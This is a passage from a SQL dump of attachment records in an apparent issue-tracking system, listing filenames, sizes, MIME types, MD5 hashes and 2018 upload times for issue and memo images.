14:33:17','','2018/07',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(86,14,'Issue','cookies2.txt','180723143413_cookies2.txt',274,NULL,'6b9b946c530a9c25a1b84cab2ac4987a',0,5,'2018-07-23 14:34:13','','2018/07',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(87,18,'Issue','c807f426ca3ead5597f74b235f83f36c','180723143501_c807f426ca3ead5597f74b235f83f36c',34964,NULL,'820fcae28b300dcecfb8ae396d7e266a',0,5,'2018-07-23 14:35:01','','2018/07',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(97,14,'Issue','20180709.jpg','180723143730_20180709.jpg',50955,NULL,'dd46f846d834a9b2c17d0ee2d3fc8cd0',0,5,'2018-07-23 14:37:30','','2018/07',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(104,NULL,NULL,'微信图片_20180716154531.jpg','180723144012_a8b2c1ba3e2ac8abb9a1380604c15e5c.jpg',31736,'','d492feaeb7a54a88d30cacf444fd47d3',0,5,'2018-07-23 14:40:12',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(106,NULL,'Memo','18acbb07db468e2c01964f3c4838a78f','180727145156_18acbb07db468e2c01964f3c4838a78f',37139,'image/jpeg','809a9d6232f7cfb2303eefd5b920e4c0',17,1,'2018-07-27 14:51:56',NULL,'2018/07',1,1,NULL,NULL,1,NULL,0,0,NULL),(109,NULL,NULL,'6B8982EA773B93AA0751668C90794C8D57F604C0_size20_w500_h278.jpeg','180802211412_6B8982EA773B93AA0751668C90794C8D57F604C0_size20_w500_h278.jpeg',21451,'image/jpeg','ecf0799205e7e1acd68a0ba3cbf79511',0,5,'2018-08-02 21:14:12',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(113,6,'Issue','SceneData.xlsx','180802225459_SceneData.xlsx',21712,NULL,'faffb15ba4291a53d89fe45a65012886',0,5,'2018-08-02 22:54:59','','2018/08',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(114,NULL,NULL,'图1.jpg','180803085114_b29f126069b56020d0a484e767002d11.jpg',8313,'image/jpeg','d12209c8488dc1fa291a06b801fe19b9',0,1,'2018-08-03 08:51:14',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(124,NULL,'IssueImage','59ff15c09f8f059c411e82ffeff44793','180803163907_59ff15c09f8f059c411e82ffeff44793',206656,'image/png','8fe4afa9bf6dfec654fe87ec08e03ba0',0,1,'2018-08-03 16:39:07',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(125,NULL,'IssueImage','c2a226f8e77b1a7952d57fb102ff0a77','180803163924_c2a226f8e77b1a7952d57fb102ff0a77',2056374,'image/bmp','fde84ac5437f4e0ae7303aea884a02d8',0,1,'2018-08-03 16:39:24',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(126,18,'ProjectImage','6e78dcb81b2f5ea553f2335b8770504c','180803173454_6e78dcb81b2f5ea553f2335b8770504c',177399,'image/gif','0b63dd538b5dbff5721fcb9ccadc2124',5,1,'2018-08-03 17:34:54',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(127,NULL,'IssueImage','c849b6a26a562939a16fd13bb794dd26','180803173757_c849b6a26a562939a16fd13bb794dd26',38761,'image/jpeg','28d4d4ab83b53636f100b1956ab79909',0,1,'2018-08-03 17:37:57',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(128,5,'IssueImage','e851ad1304f45d9252bbda6f50cf6c1a','180803174410_e851ad1304f45d9252bbda6f50cf6c1a',13267,'image/jpeg','87239cbdd8ce7d14d12bfb59855c03cb',1,1,'2018-08-03 17:44:10',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(129,17,'IssueImage','ade492106faf8dabeb3db76a9de24d8d','180803174555_ade492106faf8dabeb3db76a9de24d8d',13267,'image/jpeg','87239cbdd8ce7d14d12bfb59855c03cb',1,1,'2018-08-03 17:45:55',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(130,17,'IssueImage','d45e082d18aae9543050b4c685a6412e','180803174831_d45e082d18aae9543050b4c685a6412e',7413,'image/jpeg','ba0954594c6c87c7cab4e7b01c1a0101',1,1,'2018-08-03 17:48:31',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(131,NULL,'IssueImage','a231dbae2ec70cb8b3b72d9432d2d7ce','180803174904_a231dbae2ec70cb8b3b72d9432d2d7ce',29533,'image/jpeg','9737d73df0035bac5183a5bf43e43583',0,1,'2018-08-03 17:49:04',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(132,17,'IssueImage','27cd3594f1ddf08b9ac531068f4587dc','180803174908_27cd3594f1ddf08b9ac531068f4587dc',7389,'image/jpeg','8f0c54dc96cf877aef7bf50041fa54ee',1,1,'2018-08-03 17:49:08',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(133,21,'Issue','picture.txt','180803174912_picture.txt',3022,NULL,'d12b264ed215d34ab3b41c95c57f4ed4',0,1,'2018-08-03 17:49:12','','2018/08',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(134,NULL,'IssueImage','eec4e6c5b108a6d336a6a91f5966b443','180803174930_eec4e6c5b108a6d336a6a91f5966b443',1293078,'image/gif','c15e4d3e9f3189d1c517d11099f90ad8',0,1,'2018-08-03 17:49:30',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(135,NULL,'IssueImage','182b18c4b4fb014de57950d2b3a554c9','180803174934_182b18c4b4fb014de57950d2b3a554c9',183972,'image/jpeg','833db59c166abc6e388cb5c2f578a24f',0,1,'2018-08-03 17:49:34',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(136,21,'Issue','offer-模板范本_百度文库_20180626_151520.txt','180803175005_cde35052ea21fad2b63914a0d9d8b526.txt',510,NULL,'ede30bf1443f2140153515f53d9d29c3',0,1,'2018-08-03 17:50:05','','2018/08',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(137,21,'Issue','绿色计算产业联盟第一次会员代表大会举行.jpeg','180803175009_f38d2935af6254a8a667aa33a94f6e95.jpeg',32541,NULL,'4c37661420d40d598842652fa3a749c1',0,1,'2018-08-03 17:50:09','','2018/08',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(138,21,'IssueImage','9788bcd20dbfb69b9035cb19a230518b','180803175051_9788bcd20dbfb69b9035cb19a230518b',7413,'image/jpeg','ba0954594c6c87c7cab4e7b01c1a0101',13,1,'2018-08-03 17:50:51',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(139,21,'IssueImage','6d0ffc2d16dbc461c1b5ca3e524480e2','180803180707_6d0ffc2d16dbc461c1b5ca3e524480e2',8313,'image/jpeg','d12209c8488dc1fa291a06b801fe19b9',1,1,'2018-08-03 18:07:07',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(140,21,'IssueImage','c76a019cb69e32b0f4279cb0301f3f23','180803180827_c76a019cb69e32b0f4279cb0301f3f23',6946,'image/png','f63e4b59aad38ca96a5e35f45a717f9d',6,1,'2018-08-03 18:08:27',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(141,NULL,'IssueImage','dc84047e29e701b7825f54617583d265','180803180901_dc84047e29e701b7825f54617583d265',32541,'image/jpeg','4c37661420d40d598842652fa3a749c1',0,1,'2018-08-03 18:09:01',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(142,NULL,'IssueImage','e28924434e5420fdf8dfe41248c1833e','180803180943_e28924434e5420fdf8dfe41248c1833e',14295,'image/jpeg','a197f40fb2d83ea5329eb4eef0a83bee',0,1,'2018-08-03 18:09:43',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(143,21,'IssueImage','f574196985dc7e99e46b661e90745e41','180803181021_f574196985dc7e99e46b661e90745e41',66670,'image/jpeg','7bac1b775fc638b17a7083f3b36bfcb9',6,1,'2018-08-03 18:10:21',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(144,21,'IssueImage','8a8be21e15d22db4e47656da48788176','180803181112_8a8be21e15d22db4e47656da48788176',14295,'image/jpeg','a197f40fb2d83ea5329eb4eef0a83bee',5,1,'2018-08-03 18:11:12',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(148,NULL,'Memo','f078465611b745b2a06c2de3ec187859','180807163201_f078465611b745b2a06c2de3ec187859',519009,'image/png','4bd38fa03d7679d0dca901f15a38ebf8',5,1,'2018-08-07 16:32:01',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(149,NULL,'Memo','16a30317398b2d04075d1db8c43c4986','180807163247_16a30317398b2d04075d1db8c43c4986',559734,'image/png','630231777db46fc6c56a3e99608836a4',0,1,'2018-08-07 16:32:47',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(150,NULL,'Memo','6a6d2a679fe53266964b9133967fdaac','180807163329_6a6d2a679fe53266964b9133967fdaac',1987664,'image/png','ec4eb5c71e1c462ffd6007b64cf70c5c',5,1,'2018-08-07 16:33:29',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(151,NULL,'Memo','98e0182d32e9a0b3bb62b4633d830984','180807163420_98e0182d32e9a0b3bb62b4633d830984',559734,'image/png','630231777db46fc6c56a3e99608836a4',5,1,'2018-08-07 16:34:20',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(154,25,'Issue','微信图片_20180716154656.png','180808092954_d7d3a17350054fffc1bed0d9861bc03e.png',14955,NULL,'c9c331fa8bb53a4a0029533fbe36a7b7',0,5,'2018-08-08 09:29:54','','2018/08',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(155,NULL,'Memo','5a8432cf310cc5ab5db4ed69acc3173c','180809155935_5a8432cf310cc5ab5db4ed69acc3173c',25583,'image/png','061910bcafb914c5a9a3b5aaad9d5111',1,1,'2018-08-09 15:59:35',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(156,NULL,'Memo','5b379f739e57b63f89cfc41751ce4e2b','180809160053_5b379f739e57b63f89cfc41751ce4e2b',2930082,'image/jpeg','3bce7c2a6eab2572e222952f0cc7ffb5',1,1,'2018-08-09 16:00:53',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(157,NULL,'Memo','287a424ea7661a3f0a1ad4c88ececda0','180809160206_287a424ea7661a3f0a1ad4c88ececda0',313145,'image/jpeg','f1344db747a013c2825a59f0a26b37e1',1,1,'2018-08-09 16:02:06',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(158,NULL,'Memo','b4eebb0ba44e13d4858405e20834d1e6','180809160258_b4eebb0ba44e13d4858405e20834d1e6',44888,'image/jpeg','0a1ecd02df19733e07c8353489b99ec5',1,1,'2018-08-09 16:02:58',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(159,NULL,'Memo','9b39356e92c164cadd9da51950cad982','180809160600_9b39356e92c164cadd9da51950cad982',281837,'image/jpeg','4eb3c88b0a027d94de98ffd4b887c34b',1,1,'2018-08-09 16:06:00',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(160,NULL,'Memo','7bf4d99384c1bccfb4653534919f6b17','180809160926_7bf4d99384c1bccfb4653534919f6b17',823182,'image/jpeg','ff9376e9966fad3a0989bf53cb04461e',1,1,'2018-08-09 16:09:26',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(161,NULL,'Memo','1b781e5fb5e8564421f1bc10846f73b9','180809161445_1b781e5fb5e8564421f1bc10846f73b9',823182,'image/jpeg','ff9376e9966fad3a0989bf53cb04461e',1,1,'2018-08-09 16:14:45',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(162,NULL,'Memo','100498a1c0f21be752176f9a90615548','180809161729_100498a1c0f21be752176f9a90615548',25583,'image/png','061910bcafb914c5a9a3b5aaad9d5111',2,1,'2018-08-09 16:17:29',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(163,NULL,'Memo','650e67bc196731fac96f6c4841ed3c8a','180809161821_650e67bc196731fac96f6c4841ed3c8a',2930082,'image/jpeg','3bce7c2a6eab2572e222952f0cc7ffb5',2,1,'2018-08-09 16:18:21',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(164,NULL,'Memo','22caa3c5d0d39e200183416154d95d77','180809161843_22caa3c5d0d39e200183416154d95d77',313145,'image/jpeg','f1344db747a013c2825a59f0a26b37e1',2,1,'2018-08-09 16:18:43',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(165,NULL,'Memo','c48dd5b078fd467e4bb2006624fd11cc','180809161920_c48dd5b078fd467e4bb2006624fd11cc',44888,'image/jpeg','0a1ecd02df19733e07c8353489b99ec5',2,1,'2018-08-09 16:19:20',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(166,NULL,'Memo','917de2463ce41e6da2aa07fe1221b228','180809162008_917de2463ce41e6da2aa07fe1221b228',281837,'image/jpeg','4eb3c88b0a027d94de98ffd4b887c34b',2,1,'2018-08-09 16:20:08',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(167,NULL,'Memo','420d51e7416bfc8ab4bfbf7e70b20983','180809162108_420d51e7416bfc8ab4bfbf7e70b20983',823182,'image/jpeg','ff9376e9966fad3a0989bf53cb04461e',2,1,'2018-08-09 16:21:08',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(168,NULL,'Memo','aa9fc09e8ce495d8cc6a5528db816494','180809162217_aa9fc09e8ce495d8cc6a5528db816494',1069284,'image/jpeg','5f8349cd14f54ebd720d54c77782755a',2,1,'2018-08-09 16:22:17',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(169,NULL,'Memo','c4c10e2068155f6ea7fd7313b543a262','180809162331_c4c10e2068155f6ea7fd7313b543a262',720067,'image/jpeg','01db3eaf2cc6df15a68fed36cd3e69a6',2,1,'2018-08-09 16:23:31',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(170,NULL,'Memo','0c48e3d5f3035a74c3935f9193e03afe','180809162442_0c48e3d5f3035a74c3935f9193e03afe',538550,'image/jpeg','969798235b7e10da703db7523cb98ad7',2,1,'2018-08-09 16:24:42',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(171,NULL,'Memo','ed84df1739c67dfd7fc72e965dc826cc','180809162609_ed84df1739c67dfd7fc72e965dc826cc',321162,'image/jpeg','a5cae8d36c18c8f6e34e37426684c67a',2,1,'2018-08-09 16:26:09',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(172,NULL,'Memo','a92f3477e0cbdca444302bc31a68e3f8','180809162705_a92f3477e0cbdca444302bc31a68e3f8',369346,'image/jpeg','572fdb71cd01281c34f721b5f5095323',2,1,'2018-08-09 16:27:05',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(173,NULL,'Memo','84eec78a8f19df3e92a4f17e2adccf2f','180809162813_84eec78a8f19df3e92a4f17e2adccf2f',743477,'image/jpeg','2d0789a7b48d6631f6b4ad8c07b16f6a',2,1,'2018-08-09 16:28:13',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(175,NULL,'Memo','5f6646584c63c9e2060ceb995a49e354','180809164811_5f6646584c63c9e2060ceb995a49e354',599304,'image/png','75078bcae483a36765da80ff08b96afd',6,1,'2018-08-09 16:48:11',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(176,NULL,'Memo','52e68cd468c1513b5eafd1df6744aaab','180809164842_52e68cd468c1513b5eafd1df6744aaab',736244,'image/png','f621f87695cda0f164339894cf619817',6,1,'2018-08-09 16:48:42',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(177,NULL,'Memo','802e28f15bdaf2da56fe322717a70e4a','180809164924_802e28f15bdaf2da56fe322717a70e4a',1030522,'image/png','58da44185112e3f6c3d1c6b816e49516',6,1,'2018-08-09 16:49:24',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(179,NULL,'Memo','3f0a1684c15f88550b6ffdc267b20714','180809165513_3f0a1684c15f88550b6ffdc267b20714',82566,'image/jpeg','ff0665ff314b7e284f232aa91a34b869',15,1,'2018-08-09 16:55:13',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(180,123,'Memo','微信图片_20180809165405.jpg','180809165544_5be40e8083150dbc78eca62d5f1b5073.jpg',82566,'image/jpeg','ff0665ff314b7e284f232aa91a34b869',373,1,'2018-08-09 16:55:44',NULL,'2018/08',1,1,NULL,NULL,1,NULL,1,0,NULL),(186,NULL,'Memo','5a9abc7eea14a34ba965abc21a13ef30','180819163034_5a9abc7eea14a34ba965abc21a13ef30',2333678,'image/png','6666c97cb5a9c0d2cae51bb676a5db82',2,1,'2018-08-19 16:30:34',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(187,NULL,'Memo','0451774aaf006646ed64f80315caf6ab','180819163141_0451774aaf006646ed64f80315caf6ab',1633471,'image/png','6873d33a13971b3c432819848f27756f',2,1,'2018-08-19 16:31:41',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(188,NULL,'Memo','fc1b18a2f6258dbd65f7b5200246a72c','180819163310_fc1b18a2f6258dbd65f7b5200246a72c',1506953,'image/png','024d71d8ff0e1dbcbffd9af6abf82494',2,1,'2018-08-19 16:33:10',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(189,NULL,'Memo','6854dffa15aff6e3ca41ac4653cfb652','180819163409_6854dffa15aff6e3ca41ac4653cfb652',847798,'image/png','4e9e4d453afe8759a80bc25296f211a6',2,1,'2018-08-19 16:34:09',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(190,NULL,'Memo','99ee96af533bccfe0540c1bdb95877a8','180819163526_99ee96af533bccfe0540c1bdb95877a8',524327,'image/png','1c0cf08d3d7a1316873da9ca7150309d',2,1,'2018-08-19 16:35:26',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(191,NULL,'Memo','2ef1b5f297dee39aecefb55a29308b70','180819163614_2ef1b5f297dee39aecefb55a29308b70',649738,'image/png','4fdfb7553e738dd9fbebedfa410191c7',2,1,'2018-08-19 16:36:14',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(192,NULL,'Memo','11fa215a6c429e123d241f49aa5e9b30','180819163659_11fa215a6c429e123d241f49aa5e9b30',700955,'image/png','95b19920591870916242ce354a29c2f7',2,1,'2018-08-19 16:36:59',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(193,NULL,'Memo','687494bb3123266ced0476099a8546fa','180819163816_687494bb3123266ced0476099a8546fa',1736417,'image/png','70feb95ceffc31796554a81aff22a6a7',2,1,'2018-08-19 16:38:16',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(194,NULL,'Memo','b545cbd7e1a4142bb8ca8f038b9783aa','180819163832_b545cbd7e1a4142bb8ca8f038b9783aa',1296654,'image/png','0aca081bf085d6da9af27e4ed298af7c',2,1,'2018-08-19 16:38:32',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(195,NULL,'Memo','3c6ad9b78bdd9314858bc4d75429bc3c','180819163928_3c6ad9b78bdd9314858bc4d75429bc3c',3088043,'image/png','6b325e9a6af1cee6b975dda8f7998788',2,1,'2018-08-19 16:39:28',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(196,NULL,'Memo','5ff52ba1cfdb55e44fedf8e74de7c147','180819164005_5ff52ba1cfdb55e44fedf8e74de7c147',296716,'image/png','f95d3f724778dd5f05aaef6c8fadbf00',2,1,'2018-08-19 16:40:05',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(197,NULL,'Memo','6143db93ba63f261e3d90f6dcff5823d','180819164111_6143db93ba63f261e3d90f6dcff5823d',568006,'image/png','54e5fce8f71efbd37c97817824c3cafe',2,1,'2018-08-19 16:41:11',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(198,NULL,'Memo','fab3acc878ccb1f5066f1add0c4f3af7','180819164209_fab3acc878ccb1f5066f1add0c4f3af7',3912195,'image/png','eea022f737da161e8e826032996dc790',2,1,'2018-08-19 16:42:10',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(199,NULL,'Memo','e7f14d6d00195560159ca90c161ca0da','180819164250_e7f14d6d00195560159ca90c161ca0da',445392,'image/png','8984390dd80846400eb21c8f0cdc3c2b',2,1,'2018-08-19 16:42:50',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(200,NULL,'Memo','cd9d5316bdcef2a90a09ab2bb770e310','180819164335_cd9d5316bdcef2a90a09ab2bb770e310',4701926,'image/png','87cabcd7bd365c0378c71d94e0026a8e',2,1,'2018-08-19 16:43:35',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(203,NULL,'Memo','98f10ace4fafa377ea66a3bed90d6f89','180819173905_98f10ace4fafa377ea66a3bed90d6f89',1670349,'image/png','16a07915feb9a20127b5f411e1cdcbbd',21,1,'2018-08-19 17:39:05',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(204,NULL,'Memo','746d9d75649c51fce00b3998948d3750','180819173953_746d9d75649c51fce00b3998948d3750',278706,'image/png','02a51fdd7351b28da2c48e9efd945ff8',20,1,'2018-08-19 17:39:53',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(205,NULL,'Memo','543cbf3d06f19316e1800a83468a74ad','180819174045_543cbf3d06f19316e1800a83468a74ad',867806,'image/png','9406d3f2138ff61413542197487bcc1e',20,1,'2018-08-19 17:40:45',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(206,NULL,'Memo','e0a92704bddf8232172ea52041743b2e','180819174205_e0a92704bddf8232172ea52041743b2e',458538,'image/png','edfb9aa97ca4490072322f454445175a',20,1,'2018-08-19 17:42:05',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(207,NULL,'Memo','2bf1cc8fc106ebc52ba7db21df31b42e','180819174319_2bf1cc8fc106ebc52ba7db21df31b42e',258668,'image/png','e5577c2513f4984f6f5faa613075d413',20,1,'2018-08-19 17:43:19',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(208,NULL,'Memo','750cc1c329978039ba18b243867a29ee','180819174356_750cc1c329978039ba18b243867a29ee',530701,'image/png','8e92ffacc7a414f4ce02da85b9350cf8',20,1,'2018-08-19 17:43:56',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(209,NULL,'Memo','2bf5215fe51411525e83b363b4d414ee','180819174441_2bf5215fe51411525e83b363b4d414ee',232706,'image/png','de8c608d820073e3c6c35f894e48c61f',19,1,'2018-08-19 17:44:41',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(210,NULL,'Memo','93629fdc6ae53756e257a699cdbd4ff1','180819174518_93629fdc6ae53756e257a699cdbd4ff1',478456,'image/png','a24faf93fe81ba2dc09a4325b4b979bb',18,1,'2018-08-19 17:45:18',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(211,NULL,'Memo','3dd3c0f7b9e3d23d722e1b5efa4ecb4f','180819174557_3dd3c0f7b9e3d23d722e1b5efa4ecb4f',381622,'image/png','5903037d91245323b4d4d59777e03714',18,1,'2018-08-19 17:45:57',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(212,NULL,'Memo','7d4d208431c9aa4ea2542f8a6b5da5f1','180819174635_7d4d208431c9aa4ea2542f8a6b5da5f1',471765,'image/png','d9c4666e9ca2956078ece654181ac9db',20,1,'2018-08-19 17:46:35',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(213,NULL,'Memo','e1baa9b593b9fae4a5542c077a53e009','180819174713_e1baa9b593b9fae4a5542c077a53e009',255969,'image/jpeg','1dd1533d1b0613a64cb3708c09dcbe90',19,1,'2018-08-19 17:47:13',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(214,NULL,'Memo','86d200fc3851db48cdf9c91449d71cbe','180819174849_86d200fc3851db48cdf9c91449d71cbe',231441,'image/jpeg','fd77f7f4e5d5a6ed8bf4e8cd1212afd8',19,1,'2018-08-19 17:48:49',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(217,NULL,'Memo','76aea711c5c32ab127f3811750343f38','180819180844_76aea711c5c32ab127f3811750343f38',156372,'image/jpeg','170a6632adce922b98b1685e4c686b17',3,1,'2018-08-19 18:08:44',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(219,NULL,'Memo','6ede9c32346e818cf7405b5c2822b2d7','180819182936_6ede9c32346e818cf7405b5c2822b2d7',51915,'image/jpeg','79f1326f3007435f672518880a5eea27',3,1,'2018-08-19 18:29:36',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(220,NULL,'Memo','403274a3cb014b3442103ab6ad52b944','180819183009_403274a3cb014b3442103ab6ad52b944',36707,'image/jpeg','0dbdcc1f10f2e44b34591d21dbfb99c8',3,1,'2018-08-19 18:30:09',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(224,NULL,'Memo','754951543f77ea990c1995c8e7422ce9','180820150002_754951543f77ea990c1995c8e7422ce9',788025,'image/jpeg','8d170154c468be2b4a43a49be62dc329',6,1,'2018-08-20 15:00:02',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(225,NULL,'Memo','746e0e38a243eb9e05ed76ed21afc8c1','180820150141_746e0e38a243eb9e05ed76ed21afc8c1',1242050,'image/jpeg','333fbb93ada7ff8de0c070cd20f261f1',6,1,'2018-08-20 15:01:41',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(226,NULL,'Memo','c873764db3d25ebd25917e408d3b3b6c','180820150323_c873764db3d25ebd25917e408d3b3b6c',1655357,'image/jpeg','34090d5d2722f41a10d43857d5a98802',6,1,'2018-08-20 15:03:23',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(227,NULL,'Memo','2bdef80ef09eee8ee407e577a357c58b','180820150512_2bdef80ef09eee8ee407e577a357c58b',218825,'image/png','d063004442061351471866fb8439f897',6,1,'2018-08-20 15:05:12',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(228,NULL,'Memo','f9bab4adafd8d1f6309b56a589041c8f','180820150639_f9bab4adafd8d1f6309b56a589041c8f',715158,'image/png','6fc7e3e924c5c5790342d78df36e0ba7',6,1,'2018-08-20 15:06:39',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(229,NULL,'Memo','e5f2fe66e71bb64604023559c2b93d0e','180820150805_e5f2fe66e71bb64604023559c2b93d0e',338770,'image/png','93f1c355c694f5e124aa2107ff470801',6,1,'2018-08-20 15:08:05',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(230,NULL,'Memo','07f2882012d01fa2cf5e724f21181c2d','180820150845_07f2882012d01fa2cf5e724f21181c2d',259697,'image/png','0c53d875fec27cb5168c65bee7ccdc5b',6,1,'2018-08-20 15:08:45',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(231,NULL,'Memo','64fcba01e8ae1651d182030004797093','180820151042_64fcba01e8ae1651d182030004797093',144651,'image/png','9458da79a742e3db44912c75f54968f6',6,1,'2018-08-20 15:10:42',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(232,NULL,'Memo','34c07da92c6561d891638d0e83b10ccf','180820151150_34c07da92c6561d891638d0e83b10ccf',250621,'image/png','474ca862e73aeb637463b4e472e2866e',6,1,'2018-08-20 15:11:50',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(233,NULL,'Memo','a07a60c9715c268b80cf0c5a6429225f','180820151249_a07a60c9715c268b80cf0c5a6429225f',734118,'image/png','4f74e2cf1ed577d4234e01f0b24c150d',8,1,'2018-08-20 15:12:49',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(234,NULL,NULL,'QQ图片20180507103455.jpg','180821171733_cbddf85c3a57b2e9d785b7ddff97ee5d.jpg',9881,'image/jpeg','8f839f9c44822f62c2b7cb2186126efd',0,1,'2018-08-21 17:17:33',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(249,NULL,NULL,'中国政区2500.jpg','180822105828_110ee1f6c36cf99906e311f2debcdb48.jpg',14581440,'','f91ac61c688b840aecea5620549a17a1',0,1,'2018-08-22 10:58:28',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(253,NULL,'Memo','f938fa20a09fcd36ff3e4c5705ea74c4','180823142159_f938fa20a09fcd36ff3e4c5705ea74c4',17631,'image/png','5147f0712f42aea7da4b8c81104912c1',13,1,'2018-08-23 14:21:59',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(254,NULL,'Memo','fd508c6194b7619db711066eeaece872','180823142855_fd508c6194b7619db711066eeaece872',27114,'image/png','433c77627aca212325f7769330f74924',13,1,'2018-08-23 